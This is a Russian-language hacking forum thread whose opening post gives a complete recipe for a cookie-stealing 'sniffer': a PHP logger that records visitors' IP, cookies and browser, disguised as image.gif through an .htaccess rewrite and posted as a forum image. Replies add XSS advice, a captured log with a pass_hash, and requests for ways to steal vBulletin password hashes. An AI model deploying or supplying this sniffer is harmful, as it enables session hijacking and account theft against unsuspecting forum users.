Подходит для всех форумов.

1. Регимся на jino-net.ru
2. Загружаем туда файлы :
image.gif
sniff.php
.htaccess
log.txt


Image.gif - любое изображение.
Sniff.php должен быть след. содержания:


<? $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $brow=getenv('HTTP_USER_AGENT'); $upc=getenv('REMOTE_HOST'); $cookie=getenv('HTTP_COOKIE'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip Cookie=$cookie Browser=$brow REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?>


.htaccess такого содержания:
RewriteEngine On
RewriteRule image.gif sniff.php

Далее пишем на форуме:
в тэге IMG пишем линк к image.gif

На log.txt ставин chmod 777 и всё!
Куки у нас!

оффтоп очень удобное окошко с php кодом...

<На log.txt ставин chmod 777 и всё!

Что это значит и как это делать?

Да ты просто гений! ))))
Правда это работает так же как и снифак на ачате... но эт неважно!
А сказать прикол? кроме реферера ничего к тебе не придёт! там должна быть хсс что сразу отметает из 100% 90% =))))

2Ван никсовая команда chmod... тут он меняет права доступа к файлу

Да ты просто гений! ))))
А сказать прикол? кроме реферера ничего к тебе не придёт!
Да ладно? Ко мне уже приходили куки с форума ipb 2.0.4

Вот что пришло:
[29.10.2005 23:54:16] IP=xxxxxxx Cookie=bbmode=0; anonlogin=-1; member_id=2; pass_hash=65ab52b200fdcc7f2c80d60bb1cc9bff; forum_read=a%3A1%3A%7Bi%3A2%3Bi%3A1130599467%3B%7D Browser=Opera/8.50 (Windows NT 5.1; U; ru) REFERER=http://xxxxxxxxxxxxxxxx QUERY=

2degeneration x: хз. там понимаешь штука со снифаком какая - когда ты его запихиваешь например в <IMG> тебе необходимо(для получения куксов) прикреплять ещё и document.cookie это можно сделать только с помощью хсс! Ну сам подумай так бы все сайты ломались

на phpbb это не работает

Для phpbb эксплойтов просто завались...

и с IPB не приходит не хера путного:) так что не могло чудику прийти pass_hash= сам подписал не бось :D

:confused: :D

Это один из многих способов... Если на форуме можно дать линк на свою аватару, то проблемм нет. А вот если идёт прямая загрузка, то жопа(

Что в любом случае? даже если в поосте дать линк на фотку или из подписи? :confused:

Шас проверю ...

а как можно украсть хеш в локалке?

kolorom, нет... Kond4r имел ввиду када ты можеш в профиле указать линк на твой аватар. имхо.
$ZLO$, жжош! а отчего хеш то хоть?

2 страницы бреда.
Куки будут только с того домена, на котором находится картинка!!!
В данном случае с сайта, на котором и лежит наша картинки, ну и рефер, что ничего не даст, конечно если повезет, то даст сессию :)

Green_Bear, давно хотел спросить-помню ты давал какому-то челу совет по взлому fastbb путем xss с аватарой. Так вот как ты говоришь, "Куки будут только с того домена, на котором находится картинка!!!" .Да, это так, в чем я не раз убеждался. Тогда как можно взломать этой xss fastbb, если там аватары загружаются на сервер borda?

А как спереть хеш от vBulletin 3.5.0???
Пытался увести с помошью сниффера как описано, но куки не приходят.

А как спереть хеш от vBulletin 3.5.0???
Пытался увести с помошью сниффера как описано, но куки не приходят.
Во меня этот вопрос тоже интересует.......

Да это уже известно 100лет

Да это уже известно 100лет
Ну и как? Как угнать хеши с vBulletin 3.5.0?
Знаешь-объясни.

Почему то мне кажеться что в этой новой версии булки уязвимостей ещё нет.

вобщем у кого-то получилось у когото нет, вообще описанная техника какят-о сложно реализуемая , чем плох обычный xss? а ???

вобщем у кого-то получилось у когото нет, вообще описанная техника какят-о сложно реализуемая , чем плох обычный xss? а ???

Какую xss ты имеешь в виду? С аватарой?

где же ты такой тег вставил =) вот у меня
[17.1.2006 23:53:8] IP=xxx.xxx.xxx.xxx. Cookie= Browser=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322) REFERER=http://www.ne dam.ru/index.php?showtopic=4&st=1700&#entry27081
Это максимум :)
Вот так без * т.к. форум принимает за Imag-ешку
[i*mg]http://ne dam.jino-net.ru/s/image.gif[/i*mg]

Нармално но надо бы добавить было ещё "REAL_REMOTE_ADDR"

$realip=getenv('REAL_REMOTE_ADDR');

:)